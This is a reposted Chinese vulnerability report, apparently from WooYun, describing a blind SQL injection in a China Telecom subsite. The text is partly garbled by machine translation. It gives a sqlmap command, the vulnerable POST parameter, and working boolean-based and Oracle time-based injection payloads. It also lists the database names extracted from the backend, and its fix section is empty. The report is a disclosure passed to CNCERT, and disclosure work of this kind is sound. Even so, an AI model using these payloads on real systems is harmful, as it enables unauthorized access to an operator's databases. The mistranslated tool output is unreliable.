漏洞标题 中国电信某分站一处SQL盲注 相关厂商 电信 漏洞作者 路人甲 提交时间 2016-05-11 21:00 公开时间 2016-06-27 17:00 漏洞类型 SQL注射漏洞 危害等级 高…
漏洞标题
中国电信分站的SQL盲点
相关制造商
电信
漏洞作者
过路人
提交时间
2016-05-11 21: 00
公共时间
2016-06-27 17: 00
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
10
漏洞状态
已提交给第三方合作机构(cncert National Internet Emergency Center)
标签标签
漏洞详细信息
Sqlmap.py -u'http://**。**。**。**/webBuyAction.do; jsessionid=CC * 9BF21E4CFF1E399687470B91E04E?action=topSearch' - data'stTYPEID=1& CAPITALCODE=0& KEYWORD=1' - 关键字
漏洞证明:
放置: POST
参数: KEYWORD
输入:基于布尔值的盲
标题: AND基于布尔的盲 - WHERE或H * ING子句
有效载荷: strTYPEID=1& CAPITALCODE=0& KEYWORD=1%'AND 7253=7253 AND'%'='
输入:和/或基于时间的盲
标题: Oracle和基于时间的盲人
有效载荷: strTYPEID=1& CAPITALCODE=0& KEYWORD=1%'和7543=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)|| CHR(100)|| CHR(98)|| CHR(107),5)AND'% '='
---
后端DBMS: Oracle
可用数据库[6]:
[*] BIZCOMP
[*] OUTLN
[*] PERFSTAT
[*] SYS
[*]系统
[*] WMSYS

修理计划:
版权声明:请注明出处。居民A @乌云
-
发表于 2016-07-17 08:00
- 阅读 ( 508 )
- 分类:黑客技术